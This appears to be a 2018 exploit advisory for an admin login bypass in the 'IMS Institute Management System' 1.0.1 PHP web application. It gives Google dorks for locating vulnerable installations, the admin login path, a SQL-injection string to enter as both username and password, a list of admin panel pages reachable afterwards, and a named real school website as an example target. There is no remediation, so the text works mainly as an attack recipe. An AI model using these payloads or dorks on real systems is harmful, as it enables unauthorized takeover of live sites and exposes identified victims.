© IMS Institute Management System by JS IT Park 2017-18 Version 1.0.1 Admin Bypass Vulnerability

#################################################################################################

# Exploit Title : © IMS Institute Management System by JS IT Park 2017-18 Version 1.0.1 Admin Bypass Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 22/06/2018
# Vendor Homepage : codecanyon.net/item/ims-institute-management-system/19414428
+ codecanyon.net/item/ims-pro-institute-management-system/20773196
# Tested On : Windows
# Version : 1.0.1 
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-592  [ Authentication Bypass Issues ]

#################################################################################################

# Google Dorks : 

intext:''© IMS - Institute Management System by JS IT Park 2017-18 | Version 1.0.1''

intext:''Developed by JS IT Park''

# Administration Control Panel Path : /admin/login.php

# Exploit : 

Username : '=''or'

Password : '=''or'

# Useable URL Paths in the Control Panel : 

/admin/index.php
/ems/
/admin/profile.php
/admin/website_settings.php
/admin/website_logo.php
/admin/create_page.php
/admin/page_list.php
/admin/subpage_list.php
/admin/new_slider.php
/admin/slider_list.php
/admin/add_slider_text.php
/admin/service_section.php
/admin/update_service.php
/admin/gallery_section.php
/admin/gallery_list.php

#################################################################################################

# Example Site :  sbccomilla.edu.bd =>  Proof of Concept => archive.is/Bq57f

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################